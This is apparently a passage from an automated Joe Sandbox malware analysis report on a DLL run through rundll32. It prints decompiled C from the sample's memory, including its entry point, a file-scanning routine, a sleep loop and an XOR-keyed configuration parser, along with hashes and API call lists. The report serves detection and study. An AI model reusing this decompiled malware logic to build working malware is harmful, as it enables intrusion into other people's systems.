                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ComputerHeapName$AllocateFree
                                                  • String ID:
                                                  • API String ID: 187446995-0
                                                  • Opcode ID: 7976ef5f8686c07b26171fec2765da5519094a2765008a686b64461381ca628b
                                                  • Instruction ID: 259dbfeb4db1886d1c68afcc654af6a6a264ff5c873f8c40d3a918ddf8e9e705
                                                  • Opcode Fuzzy Hash: 7976ef5f8686c07b26171fec2765da5519094a2765008a686b64461381ca628b
                                                  • Instruction Fuzzy Hash: 0AF05466600149BAEB21D6AB9C40FAF76BDDBC5655F1100A5A904D3140EA70FE059770
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B38055, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x4b3d23c) == 0) {
						E04B3970F();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x4b3d23c) == 1) {
						_t10 = E04B36A56(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                  0x04b3805c
                                                  0x04b3805d
                                                  0x04b38060
                                                  0x04b38092
                                                  0x04b38094
                                                  0x04b38094
                                                  0x04b38062
                                                  0x04b38063
                                                  0x04b38078
                                                  0x04b3807f
                                                  0x04b38081
                                                  0x04b38081
                                                  0x04b3807f
                                                  0x04b38063
                                                  0x04b3809c

                                                  APIs
                                                  • InterlockedIncrement.KERNEL32(04B3D23C), ref: 04B3806A
                                                    • Part of subcall function 04B36A56: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04B3807D,?), ref: 04B36A69
                                                  • InterlockedDecrement.KERNEL32(04B3D23C), ref: 04B3808A
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Interlocked$CreateDecrementHeapIncrement
                                                  • String ID:
                                                  • API String ID: 3834848776-0
                                                  • Opcode ID: d43f8123608bf297b634223eecef71ee6cb787ff85a2166835116e95f84f1ac5
                                                  • Instruction ID: a1412f7bab43b0702baf34dfcb180788ec00beca90f84cf5ae58636b8d2ea9b4
                                                  • Opcode Fuzzy Hash: d43f8123608bf297b634223eecef71ee6cb787ff85a2166835116e95f84f1ac5
                                                  • Instruction Fuzzy Hash: A3E04F7634422257A7317BB79C04B5EBA94EB00B87F054494F6C5D5070D660F8519AF3
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B39318, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 34%
                                                  			E04B39318(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x4b3d27c; // 0x1fba5a8
				_t4 = _t15 + 0x4b3e39c; // 0x6af8944
				_t20 = _t4;
				_t6 = _t15 + 0x4b3e124; // 0x650047
				_t17 = E04B39152(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E04B39FC9(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                  0x04b39322
                                                  0x04b39324
                                                  0x04b3932b
                                                  0x04b3932c
                                                  0x04b3932d
                                                  0x04b3932e
                                                  0x04b39334
                                                  0x04b39339
                                                  0x04b39339
                                                  0x04b39343
                                                  0x04b39355
                                                  0x04b3935c
                                                  0x04b3938b
                                                  0x04b3935e
                                                  0x04b39363
                                                  0x04b39388
                                                  0x04b39365
                                                  0x04b39368
                                                  0x04b3936f
                                                  0x04b3937a
                                                  0x04b39371
                                                  0x04b39374
                                                  0x04b39374
                                                  0x04b3937e
                                                  0x04b3937e
                                                  0x04b39363
                                                  0x04b39392

                                                  APIs
                                                    • Part of subcall function 04B39152: SysFreeString.OLEAUT32(?), ref: 04B39231
                                                    • Part of subcall function 04B39FC9: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04B37946,004F0053,00000000,?), ref: 04B39FD2
                                                    • Part of subcall function 04B39FC9: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04B37946,004F0053,00000000,?), ref: 04B39FFC
                                                    • Part of subcall function 04B39FC9: memset.NTDLL ref: 04B3A010
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04B3937E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeString$lstrlenmemcpymemset
                                                  • String ID:
                                                  • API String ID: 397948122-0
                                                  • Opcode ID: af7dff38e7066a025d398ce0b4d6f0e443d438211d4cd0adc5bab5bdc1c09ec4
                                                  • Instruction ID: 1672483eee587c46a7dc1d037cd5458a257d9bb062cdc02b2deeca28463adf7c
                                                  • Opcode Fuzzy Hash: af7dff38e7066a025d398ce0b4d6f0e443d438211d4cd0adc5bab5bdc1c09ec4
                                                  • Instruction Fuzzy Hash: 10019EB2504019BBDF119FAACC449AEBBB8EB44701F0148A6E911E30A0E3B0B9589791
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B321CD, Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 70%
                                                  			E04B321CD(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x4b3d330;
				E04B384D5();
				while(1) {
					_t8 = E04B312D4(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E04B3809F(_t14);
					if(_t15 == 0) {
						HeapFree( *0x4b3d238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E04B384D5();
					if(_t19 != 0) {
						_t22 =  *0x4b3d338; // 0x6af9b70
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}













                                                  0x04b321d5
                                                  0x04b321d9
                                                  0x04b321da
                                                  0x04b321db
                                                  0x04b321e0
                                                  0x04b321e5
                                                  0x04b321ec
                                                  0x04b321f3
                                                  0x00000000
                                                  0x00000000
                                                  0x04b321f5
                                                  0x04b321fa
                                                  0x04b321fb
                                                  0x04b32202
                                                  0x04b3221c
                                                  0x00000000
                                                  0x04b32204
                                                  0x04b32204
                                                  0x04b32206
                                                  0x04b32209
                                                  0x04b3220d
                                                  0x00000000
                                                  0x00000000
                                                  0x04b3220f
                                                  0x04b3220d
                                                  0x04b32224
                                                  0x04b32224
                                                  0x04b32226
                                                  0x04b3222d
                                                  0x04b3222f
                                                  0x04b32235
                                                  0x04b3223c
                                                  0x04b3224c
                                                  0x04b32244
                                                  0x04b32247
                                                  0x04b32247
                                                  0x04b3224f
                                                  0x04b3224f
                                                  0x04b32258
                                                  0x04b32258
                                                  0x04b32222
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 04B384D5: GetProcAddress.KERNEL32(36776F57,04B321E5), ref: 04B384F0
                                                    • Part of subcall function 04B312D4: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 04B312FF
                                                    • Part of subcall function 04B312D4: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 04B31321
                                                    • Part of subcall function 04B312D4: memset.NTDLL ref: 04B3133B
                                                    • Part of subcall function 04B312D4: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04B31379
                                                    • Part of subcall function 04B312D4: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04B3138D
                                                    • Part of subcall function 04B312D4: FindCloseChangeNotification.KERNELBASE(00000000), ref: 04B313A4
                                                    • Part of subcall function 04B312D4: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04B313B0
                                                    • Part of subcall function 04B312D4: lstrcat.KERNEL32(?,642E2A5C), ref: 04B313F1
                                                    • Part of subcall function 04B312D4: FindFirstFileA.KERNELBASE(?,?), ref: 04B31407
                                                    • Part of subcall function 04B3809F: lstrlen.KERNEL32(?,00000000,04B3D330,00000001,04B32200,04B3D00C,04B3D00C,00000000,00000005,00000000,00000000,?,?,?,04B396C1,04B323E9), ref: 04B380A8
                                                    • Part of subcall function 04B3809F: mbstowcs.NTDLL ref: 04B380CF
                                                    • Part of subcall function 04B3809F: memset.NTDLL ref: 04B380E1
                                                  • HeapFree.KERNEL32(00000000,04B3D00C,04B3D00C,04B3D00C,00000000,00000005,00000000,00000000,?,?,?,04B396C1,04B323E9,04B3D00C,?,04B323E9), ref: 04B3221C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                                  • String ID:
                                                  • API String ID: 983081259-0
                                                  • Opcode ID: 3f5e520bad993f62720ead3074cbd6ed7c3a142ad2fc5866435d64ea953e9aa4
                                                  • Instruction ID: a8b46aa4c0e23a83d0ab38e55124d59cb8e2370b99bf6cba4d40b50e09fd1f8f
                                                  • Opcode Fuzzy Hash: 3f5e520bad993f62720ead3074cbd6ed7c3a142ad2fc5866435d64ea953e9aa4
                                                  • Instruction Fuzzy Hash: 9D01B536200204AAFF04EFEBDC80B6A76A9EB85366F5004F6B944D7050D679BC459661
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B31262, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E04B31262(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				signed short _t18;
				void* _t24;
				signed int _t26;
				signed short _t27;

				if(_a4 != 0) {
					_t18 = E04B39318(_a4, _a8, _a12, __esi); // executed
					_t27 = _t18;
				} else {
					_t27 = E04B36BFA(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t27 == 0) {
						_t26 = _a8 >> 1;
						if(_t26 == 0) {
							_t27 = 2;
							HeapFree( *0x4b3d238, 0, _a12);
						} else {
							_t24 = _a12;
							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
							 *__esi = _t24;
						}
					}
				}
				return _t27;
			}







                                                  0x04b3126a
                                                  0x04b312bf
                                                  0x04b312c4
                                                  0x04b3126c
                                                  0x04b31286
                                                  0x04b3128a
                                                  0x04b3128f
                                                  0x04b31291
                                                  0x04b312a1
                                                  0x04b312ad
                                                  0x04b31293
                                                  0x04b31293
                                                  0x04b31296
                                                  0x04b3129b
                                                  0x04b3129b
                                                  0x04b31291
                                                  0x04b3128a
                                                  0x04b312ca

                                                  APIs
                                                  • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,04B3743A,?,004F0053,06AF9388,00000000,?), ref: 04B312AD
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 4a5e439cfd20b6a76afcbde52fe1ed4b78b2059b1d746503a117e1b563a4c0d8
                                                  • Instruction ID: 1b8699f16bcb3cf14a9737d903b329c1b76fd6772f0c7155b3d89881c0ec8af9
                                                  • Opcode Fuzzy Hash: 4a5e439cfd20b6a76afcbde52fe1ed4b78b2059b1d746503a117e1b563a4c0d8
                                                  • Instruction Fuzzy Hash: 7B011D32100249FBDF22DF9ACC01FAE3BBAEB84362F148469FA159A160D771E521DB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B32436, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E04B32436(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                                                  0x04b32436
                                                  0x04b32443
                                                  0x04b32444
                                                  0x04b32445
                                                  0x04b3244c
                                                  0x04b3247a
                                                  0x04b3247b
                                                  0x04b3247e
                                                  0x04b32484
                                                  0x00000000
                                                  0x00000000
                                                  0x04b32463
                                                  0x04b3246d
                                                  0x04b32474
                                                  0x00000000
                                                  0x04b32465
                                                  0x04b32468
                                                  0x04b32488
                                                  0x04b3246a
                                                  0x04b3246a
                                                  0x00000000
                                                  0x04b3246a
                                                  0x04b32468
                                                  0x04b3248f
                                                  0x04b32495
                                                  0x04b32495
                                                  0x00000000

                                                  APIs
                                                  • Sleep.KERNELBASE(000001F4), ref: 04B3247E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 98cbcaccafeeddcc95818c12f4c4561934fec87014fbed6aec76b0ec3567a611
                                                  • Instruction ID: 25776bb1c5cec8222f9d37989db7c5ccd1747d16f7a04dd675e1deacc3a06194
                                                  • Opcode Fuzzy Hash: 98cbcaccafeeddcc95818c12f4c4561934fec87014fbed6aec76b0ec3567a611
                                                  • Instruction Fuzzy Hash: CEF03C75D01219EFDB04DB99D588AEDB7B8EF04306F1080EAE60267101D3B56B44CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B32659, Relevance: 1.3, APIs: 1, Instructions: 24stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(04B33C81,?,?,04B319A9,3D04B3C0,80000002,04B33C81,04B38B1E,74666F53,4D4C4B48,04B38B1E,?,3D04B3C0,80000002,04B33C81,?), ref: 04B32679
                                                    • Part of subcall function 04B31A03: SysAllocString.OLEAUT32(04B38B1E), ref: 04B31A1D
                                                    • Part of subcall function 04B31A03: SysFreeString.OLEAUT32(00000000), ref: 04B31A5D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFreelstrlen
                                                  • String ID:
                                                  • API String ID: 3808004451-0
                                                  • Opcode ID: 861b4a0f8a576caa04bda9a920eb608b696aaf44404f9d0020545fdd6fa3cab3
                                                  • Instruction ID: 6dcfbde3a8469f395514b3abfc458d2dc17045cb8df63c9616e659042b06a7ec
                                                  • Opcode Fuzzy Hash: 861b4a0f8a576caa04bda9a920eb608b696aaf44404f9d0020545fdd6fa3cab3
                                                  • Instruction Fuzzy Hash: 37E0A53600010DBFDF165F91DC46E9A3F6AEF04356F008095BA1414020D732A571EBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 04B34094, Relevance: 9.2, APIs: 6, Instructions: 223memoryCOMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E04B34094(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t46;
				intOrPtr _t49;
				signed int _t50;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t85;
				intOrPtr _t102;

				_t86 = __ecx;
				_t20 =  *0x4b3d278; // 0x63699bc3
				if(E04B38748( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0x4b3d2d4 = _v12;
				}
				_t25 =  *0x4b3d278; // 0x63699bc3
				if(E04B38748( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L60;
				} else {
					_t85 = _v12;
					if(_t85 == 0) {
						_t31 = 0;
					} else {
						_t80 =  *0x4b3d278; // 0x63699bc3
						_t31 = E04B33F7C(_t86, _t85, _t80 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x4b3d240 = _v8;
						}
					}
					if(_t85 == 0) {
						_t32 = 0;
					} else {
						_t76 =  *0x4b3d278; // 0x63699bc3
						_t32 = E04B33F7C(_t86, _t85, _t76 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x4b3d244 = _v8;
						}
					}
					if(_t85 == 0) {
						_t33 = 0;
					} else {
						_t72 =  *0x4b3d278; // 0x63699bc3
						_t33 = E04B33F7C(_t86, _t85, _t72 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x4b3d248 = _v8;
						}
					}
					if(_t85 == 0) {
						_t34 = 0;
					} else {
						_t68 =  *0x4b3d278; // 0x63699bc3
						_t34 = E04B33F7C(_t86, _t85, _t68 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0x4b3d004 = _v8;
						}
					}
					if(_t85 == 0) {
						_t35 = 0;
					} else {
						_t64 =  *0x4b3d278; // 0x63699bc3
						_t35 = E04B33F7C(_t86, _t85, _t64 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0x4b3d02c = _v8;
						}
					}
					if(_t85 == 0) {
						_t36 = 0;
					} else {
						_t60 =  *0x4b3d278; // 0x63699bc3
						_t36 = E04B33F7C(_t86, _t85, _t60 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t57 = 0x10;
						_t58 = E04B36ED2(_t57);
						if(_t58 != 0) {
							_push(_t58);
							E04B3A5D6();
						}
					}
					if(_t85 == 0) {
						_t37 = 0;
					} else {
						_t55 =  *0x4b3d278; // 0x63699bc3
						_t37 = E04B33F7C(_t86, _t85, _t55 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E04B36ED2(0, _t37) != 0) {
						_t102 =  *0x4b3d32c; // 0x6af95b0
						E04B375E9(_t102 + 4, _t53);
					}
					if(_t85 == 0) {
						_t38 = 0;
					} else {
						_t50 =  *0x4b3d278; // 0x63699bc3
						_t38 = E04B33F7C(_t86, _t85, _t50 ^ 0x372ab5b7);
					}
					if(_t38 == 0) {
						L51:
						_t39 =  *0x4b3d27c; // 0x1fba5a8
						_t18 = _t39 + 0x4b3e252; // 0x616d692f
						 *0x4b3d2d0 = _t18;
						goto L52;
					} else {
						_t49 = E04B36ED2(0, _t38);
						 *0x4b3d2d0 = _t49;
						if(_t49 != 0) {
							L52:
							if(_t85 == 0) {
								_t41 = 0;
							} else {
								_t46 =  *0x4b3d278; // 0x63699bc3
								_t41 = E04B33F7C(_t86, _t85, _t46 ^ 0xd8dc5cde);
							}
							if(_t41 == 0) {
								_t42 =  *0x4b3d27c; // 0x1fba5a8
								_t19 = _t42 + 0x4b3e791; // 0x6976612e
								_t43 = _t19;
							} else {
								_t43 = E04B36ED2(0, _t41);
							}
							 *0x4b3d340 = _t43;
							HeapFree( *0x4b3d238, 0, _t85);
							L60:
							return 0;
						}
						goto L51;
					}
				}
			}


































                                                  0x04b34094
                                                  0x04b34097
                                                  0x04b340b7
                                                  0x04b340c5
                                                  0x04b340c5
                                                  0x04b340ca
                                                  0x04b340e4
                                                  0x04b342e2
                                                  0x04b342e4
                                                  0x00000000
                                                  0x04b340ea
                                                  0x04b340ea
                                                  0x04b340f1
                                                  0x04b34107
                                                  0x04b340f3
                                                  0x04b340f3
                                                  0x04b34100
                                                  0x04b34100
                                                  0x04b34111
                                                  0x04b34113
                                                  0x04b3411d
                                                  0x04b34122
                                                  0x04b34122
                                                  0x04b3411d
                                                  0x04b34129
                                                  0x04b3413f
                                                  0x04b3412b
                                                  0x04b3412b
                                                  0x04b34138
                                                  0x04b34138
                                                  0x04b34143
                                                  0x04b34145
                                                  0x04b3414f
                                                  0x04b34154
                                                  0x04b34154
                                                  0x04b3414f
                                                  0x04b3415b
                                                  0x04b34171
                                                  0x04b3415d
                                                  0x04b3415d
                                                  0x04b3416a
                                                  0x04b3416a
                                                  0x04b34175
                                                  0x04b34177
                                                  0x04b34181
                                                  0x04b34186
                                                  0x04b34186
                                                  0x04b34181
                                                  0x04b3418d
                                                  0x04b341a3
                                                  0x04b3418f
                                                  0x04b3418f
                                                  0x04b3419c
                                                  0x04b3419c
                                                  0x04b341a7
                                                  0x04b341a9
                                                  0x04b341b3
                                                  0x04b341b8
                                                  0x04b341b8
                                                  0x04b341b3
                                                  0x04b341bf
                                                  0x04b341d5
                                                  0x04b341c1
                                                  0x04b341c1
                                                  0x04b341ce
                                                  0x04b341ce
                                                  0x04b341d9
                                                  0x04b341db
                                                  0x04b341e5
                                                  0x04b341ea
                                                  0x04b341ea
                                                  0x04b341e5
                                                  0x04b341f1
                                                  0x04b34207
                                                  0x04b341f3
                                                  0x04b341f3
                                                  0x04b34200
                                                  0x04b34200
                                                  0x04b3420b
                                                  0x04b3420d
                                                  0x04b34210
                                                  0x04b34211
                                                  0x04b34218
                                                  0x04b3421a
                                                  0x04b3421b
                                                  0x04b3421b
                                                  0x04b34218
                                                  0x04b34222
                                                  0x04b34238
                                                  0x04b34224
                                                  0x04b34224
                                                  0x04b34231
                                                  0x04b34231
                                                  0x04b3423c
                                                  0x04b3424a
                                                  0x04b34254
                                                  0x04b34254
                                                  0x04b3425b
                                                  0x04b34271
                                                  0x04b3425d
                                                  0x04b3425d
                                                  0x04b3426a
                                                  0x04b3426a
                                                  0x04b34275
                                                  0x04b34288
                                                  0x04b34288
                                                  0x04b3428d
                                                  0x04b34293
                                                  0x00000000
                                                  0x04b34277
                                                  0x04b3427a
                                                  0x04b34281
                                                  0x04b34286
                                                  0x04b34298
                                                  0x04b3429a
                                                  0x04b342b0
                                                  0x04b3429c
                                                  0x04b3429c
                                                  0x04b342a9
                                                  0x04b342a9
                                                  0x04b342b4
                                                  0x04b342c0
                                                  0x04b342c5
                                                  0x04b342c5
                                                  0x04b342b6
                                                  0x04b342b9
                                                  0x04b342b9
                                                  0x04b342d3
                                                  0x04b342d8
                                                  0x04b342e5
                                                  0x04b342e9
                                                  0x04b342e9
                                                  0x00000000
                                                  0x04b34286
                                                  0x04b34275

                                                  APIs
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,04B323DE,?,63699BC3,04B323DE,?,63699BC3,00000005,04B3D00C,00000008,?,04B323DE), ref: 04B34119
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,04B323DE,?,63699BC3,04B323DE,?,63699BC3,00000005,04B3D00C,00000008,?,04B323DE), ref: 04B3414B
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,04B323DE,?,63699BC3,04B323DE,?,63699BC3,00000005,04B3D00C,00000008,?,04B323DE), ref: 04B3417D
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,04B323DE,?,63699BC3,04B323DE,?,63699BC3,00000005,04B3D00C,00000008,?,04B323DE), ref: 04B341AF
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,04B323DE,?,63699BC3,04B323DE,?,63699BC3,00000005,04B3D00C,00000008,?,04B323DE), ref: 04B341E1
                                                  • HeapFree.KERNEL32(00000000,04B323DE,04B323DE,?,63699BC3,04B323DE,?,63699BC3,00000005,04B3D00C,00000008,?,04B323DE), ref: 04B342D8
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
